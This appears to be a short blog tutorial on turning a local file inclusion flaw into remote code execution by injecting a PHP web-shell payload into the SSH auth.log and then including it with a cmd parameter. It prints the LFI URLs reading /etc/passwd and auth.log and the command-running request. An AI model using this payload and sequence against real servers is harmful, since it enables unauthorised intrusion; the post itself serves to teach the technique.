Converting LFI to RCE via Log Poisoning

Himanshu Singavane
2 min readApr 17, 2021

--

Hello everyone, This is my first blog on Remote Code Execution (RCE) using Local File Inclusion with Log Poisoning.

What is RCE ?

In basic words Remote Code Execution is a vulnerability that allows attackers to access a system and read or delete their contents, make changes etc.

What is LFI ?

In basic words Local File Inclusion is used by attackers to trick the web application into exposing or running files on the web server. It can lead to information disclosure, remote code execution, or XSS. LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.

What are Logs ?

A log file is a computer generated data file that contains information about usage patterns, activities, and operations within an operating system, application, server or another device.

What is auth.log file ?

It contains system authorization information, including user logins and authentication mechanism that were used.

NOTE : If you want to learn more about different log files then visit — https://www.thegeekstuff.com/2011/08/linux-var-log-files/

What is log poisoning ?

Log Poisoning is a common technique used to gain a reverse shell from a LFI vulnerability. To make it work an attacker attempts to inject malicious input to the server log.

How this vulnerability work ?

  1. This is the endpoint where is Basic Local file inclusion vulnerability.

http://example.com/lfi.php?file=/etc/passwd

From the given image you can observe that the above URL has dumped the following result shown below.

2. Then I tried to access /var/log/auth.log file.

http://example.com/lfi.php?file=/var/log/auth.log

3. Now try to make fake attempts with a PHP payload as a user on the SSH server of my target machine which will be saved in the auth.log file.

PHP Payload : <?php system($_GET[‘cmd’]); ?>

4. Now access the endpoint with /var/log/auth.log&cmd=ping -c 30 8.8.8.8 and successfully got a Remote Code Execution

http://example.com/lfi.php?file=/var/log/auth.log&cmd=ping%20-c%2030%208.8.8.8

Thanks for reading!

--

--

Himanshu Singavane
Himanshu Singavane

No responses yet